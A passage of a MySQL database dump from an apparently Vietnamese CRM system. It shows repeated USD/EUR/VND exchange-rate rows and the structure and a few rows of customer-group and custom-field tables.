(9439, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-16'),
(9440, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9441, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-16'),
(9442, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9443, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9444, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-16'),
(9445, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-16'),
(9446, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9447, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-16'),
(9448, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9449, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9450, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-16'),
(9451, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-16'),
(9452, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9453, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-16'),
(9454, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9455, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9456, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-16'),
(9457, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-16'),
(9458, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9459, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-16'),
(9460, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9461, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9462, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-16'),
(9463, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9464, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9465, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9466, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9467, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9468, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9469, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9470, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9471, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9472, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9473, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9474, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9475, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9476, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9477, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9478, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9479, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9480, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9481, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9482, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9483, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9484, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9485, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9486, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9487, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9488, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9489, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9490, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9491, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9492, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9493, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9494, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9495, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9496, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9497, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9498, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9499, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9500, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9501, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9502, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9503, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9504, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9505, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-17'),
(9506, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9507, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-17'),
(9508, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-17'),
(9509, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-17'),
(9510, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-17'),
(9511, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9512, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9513, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9514, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9515, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9516, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9517, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9518, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9519, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9520, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9521, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9522, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9523, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9524, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9525, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9526, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9527, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9528, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9529, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9530, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9531, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9532, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9533, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9534, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9535, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9536, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9537, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9538, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9539, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9540, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9541, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9542, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9543, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9544, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9545, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9546, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9547, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9548, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9549, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9550, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9551, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9552, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9553, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-18'),
(9554, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9555, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-18'),
(9556, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-18'),
(9557, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-18'),
(9558, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-18'),
(9559, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-19'),
(9560, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9561, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-19'),
(9562, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9563, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9564, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9565, 1, 'USD', 0.000000, 2, 'EUR', 0.937820, '2023-09-19'),
(9566, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9567, 2, 'EUR', 0.000000, 1, 'USD', 1.066300, '2023-09-19'),
(9568, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9569, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9570, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9571, 1, 'USD', 1.000000, 2, 'EUR', 0.937820, '2023-09-19'),
(9572, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9573, 2, 'EUR', 1.000000, 1, 'USD', 1.066300, '2023-09-19'),
(9574, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9575, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9576, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9577, 1, 'USD', 0.000000, 2, 'EUR', 0.937820, '2023-09-19'),
(9578, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9579, 2, 'EUR', 0.000000, 1, 'USD', 1.066300, '2023-09-19'),
(9580, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9581, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9582, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9583, 1, 'USD', 1.000000, 2, 'EUR', 0.937820, '2023-09-19'),
(9584, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9585, 2, 'EUR', 1.000000, 1, 'USD', 1.066300, '2023-09-19'),
(9586, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9587, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9588, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9589, 1, 'USD', 0.000000, 2, 'EUR', 0.937820, '2023-09-19'),
(9590, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9591, 2, 'EUR', 0.000000, 1, 'USD', 1.066300, '2023-09-19'),
(9592, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9593, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9594, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9595, 1, 'USD', 1.000000, 2, 'EUR', 0.937820, '2023-09-19'),
(9596, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9597, 2, 'EUR', 1.000000, 1, 'USD', 1.066300, '2023-09-19'),
(9598, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9599, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9600, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9601, 1, 'USD', 0.000000, 2, 'EUR', 0.937820, '2023-09-19'),
(9602, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9603, 2, 'EUR', 0.000000, 1, 'USD', 1.066300, '2023-09-19'),
(9604, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-19'),
(9605, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-19'),
(9606, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-19'),
(9607, 1, 'USD', 1.000000, 2, 'EUR', 0.937820, '2023-09-20'),
(9608, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9609, 2, 'EUR', 1.000000, 1, 'USD', 1.066300, '2023-09-20'),
(9610, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9611, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9612, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9613, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-20'),
(9614, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9615, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-20'),
(9616, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9617, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9618, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9619, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-20'),
(9620, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9621, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-20'),
(9622, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9623, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9624, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9625, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-20'),
(9626, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9627, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-20'),
(9628, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9629, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9630, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9631, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-20'),
(9632, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9633, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-20'),
(9634, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9635, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9636, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9637, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-20'),
(9638, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9639, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-20'),
(9640, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9641, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9642, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9643, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-20'),
(9644, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9645, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-20'),
(9646, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9647, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9648, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9649, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-20'),
(9650, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9651, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-20'),
(9652, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-20'),
(9653, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-20'),
(9654, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-20'),
(9655, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-21'),
(9656, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9657, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-21'),
(9658, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9659, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9660, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9661, 1, 'USD', 0.000000, 2, 'EUR', 0.934400, '2023-09-21'),
(9662, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9663, 2, 'EUR', 0.000000, 1, 'USD', 1.070200, '2023-09-21'),
(9664, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9665, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9666, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9667, 1, 'USD', 1.000000, 2, 'EUR', 0.934400, '2023-09-21'),
(9668, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9669, 2, 'EUR', 1.000000, 1, 'USD', 1.070200, '2023-09-21'),
(9670, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9671, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9672, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9673, 1, 'USD', 0.000000, 2, 'EUR', 0.934400, '2023-09-21'),
(9674, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9675, 2, 'EUR', 0.000000, 1, 'USD', 1.070200, '2023-09-21'),
(9676, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9677, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9678, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9679, 1, 'USD', 1.000000, 2, 'EUR', 0.934400, '2023-09-21'),
(9680, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9681, 2, 'EUR', 1.000000, 1, 'USD', 1.070200, '2023-09-21'),
(9682, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9683, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9684, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9685, 1, 'USD', 0.000000, 2, 'EUR', 0.934400, '2023-09-21'),
(9686, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9687, 2, 'EUR', 0.000000, 1, 'USD', 1.070200, '2023-09-21'),
(9688, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9689, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9690, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9691, 1, 'USD', 1.000000, 2, 'EUR', 0.934400, '2023-09-21'),
(9692, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9693, 2, 'EUR', 1.000000, 1, 'USD', 1.070200, '2023-09-21'),
(9694, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9695, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9696, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9697, 1, 'USD', 0.000000, 2, 'EUR', 0.934400, '2023-09-21'),
(9698, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9699, 2, 'EUR', 0.000000, 1, 'USD', 1.070200, '2023-09-21'),
(9700, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-21'),
(9701, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-21'),
(9702, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-21'),
(9703, 1, 'USD', 1.000000, 2, 'EUR', 0.934400, '2023-09-22'),
(9704, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9705, 2, 'EUR', 1.000000, 1, 'USD', 1.070200, '2023-09-22'),
(9706, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9707, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9708, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-22'),
(9709, 1, 'USD', 0.000000, 2, 'EUR', 0.940290, '2023-09-22'),
(9710, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9711, 2, 'EUR', 0.000000, 1, 'USD', 1.063500, '2023-09-22'),
(9712, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9713, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9714, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-22'),
(9715, 1, 'USD', 1.000000, 2, 'EUR', 0.940290, '2023-09-22'),
(9716, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9717, 2, 'EUR', 1.000000, 1, 'USD', 1.063500, '2023-09-22'),
(9718, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9719, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9720, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-22'),
(9721, 1, 'USD', 0.000000, 2, 'EUR', 0.940290, '2023-09-22'),
(9722, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9723, 2, 'EUR', 0.000000, 1, 'USD', 1.063500, '2023-09-22'),
(9724, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9725, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9726, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-22'),
(9727, 1, 'USD', 1.000000, 2, 'EUR', 0.940290, '2023-09-22'),
(9728, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9729, 2, 'EUR', 1.000000, 1, 'USD', 1.063500, '2023-09-22'),
(9730, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9731, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9732, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-22'),
(9733, 1, 'USD', 0.000000, 2, 'EUR', 0.940290, '2023-09-22'),
(9734, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9735, 2, 'EUR', 0.000000, 1, 'USD', 1.063500, '2023-09-22'),
(9736, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9737, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9738, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-22'),
(9739, 1, 'USD', 1.000000, 2, 'EUR', 0.940290, '2023-09-22'),
(9740, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9741, 2, 'EUR', 1.000000, 1, 'USD', 1.063500, '2023-09-22'),
(9742, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9743, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9744, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-22'),
(9745, 1, 'USD', 0.000000, 2, 'EUR', 0.940290, '2023-09-22'),
(9746, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9747, 2, 'EUR', 0.000000, 1, 'USD', 1.063500, '2023-09-22'),
(9748, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-22'),
(9749, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-22'),
(9750, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-22');

-- --------------------------------------------------------

--
-- Table structure for table `tblcustomers_groups`
--

CREATE TABLE `tblcustomers_groups` (
  `id` int(11) NOT NULL,
  `name` varchar(191) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcustomers_groups`
--

INSERT INTO `tblcustomers_groups` (`id`, `name`) VALUES
(1, 'Công ty / Doanh nghiệp'),
(2, 'Học viên cá nhân');

-- --------------------------------------------------------

--
-- Table structure for table `tblcustomer_admins`
--

CREATE TABLE `tblcustomer_admins` (
  `staff_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `date_assigned` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcustomer_groups`
--

CREATE TABLE `tblcustomer_groups` (
  `id` int(11) NOT NULL,
  `groupid` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcustomer_groups`
--

INSERT INTO `tblcustomer_groups` (`id`, `groupid`, `customer_id`) VALUES
(266, 2, 1449);

-- --------------------------------------------------------

--
-- Table structure for table `tblcustomfields`
--

CREATE TABLE `tblcustomfields` (
  `id` int(11) NOT NULL,
  `fieldto` varchar(30) DEFAULT NULL,
  `name` varchar(150) NOT NULL,
  `slug` varchar(150) NOT NULL,
  `required` tinyint(1) NOT NULL DEFAULT 0,
  `type` varchar(20) NOT NULL,
  `options` mediumtext DEFAULT NULL,
  `display_inline` tinyint(1) NOT NULL DEFAULT 0,
  `field_order` int(11) DEFAULT 0,
  `active` int(11) NOT NULL DEFAULT 1,
  `show_on_pdf` int(11) NOT NULL DEFAULT 0,
  `show_on_ticket_form` tinyint(1) NOT NULL DEFAULT 0,
  `only_admin` tinyint(1) NOT NULL DEFAULT 0,
  `show_on_table` tinyint(1) NOT NULL DEFAULT 0,
  `show_on_client_portal` int(11) NOT NULL DEFAULT 0,
  `disalow_client_to_edit` int(11) NOT NULL DEFAULT 0,
  `bs_column` int(11) NOT NULL DEFAULT 12,
  `default_value` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcustomfields`
--

INSERT INTO `tblcustomfields` (`id`, `fieldto`, `name`, `slug`, `required`, `type`, `options`, `display_inline`, `field_order`, `active`, `show_on_pdf`, `show_on_ticket_form`, `only_admin`, `show_on_table`, `show_on_client_portal`, `disalow_client_to_edit`, `bs_column`, `default_value`) VALUES
(2, 'estimate', 'Hạng mục/Công trình', 'company_dia_chi', 0, 'textarea', '', 0, 0, 1, 1, 0, 0, 1, 1, 0, 12, ''),
(3, 'contracts', 'Hạng mục/Công trình', 'contracts_hang_muc_cong_trinh', 0, 'textarea', '', 0, 0, 1, 0, 0, 0, 1, 1, 0, 12, ''),
(4, 'warehouse_name', 'Điều kiện bảo hành sản phẩm', 'items_hinh_anh_san_pham', 0, 'textarea', '', 0, 0, 1, 0, 0, 0, 1, 0, 0, 12, ''),
(5, 'estimate', 'Email', 'estimate_email', 0, 'input', '', 0, 0, 0, 1, 0, 0, 0, 1, 0, 12, ''),
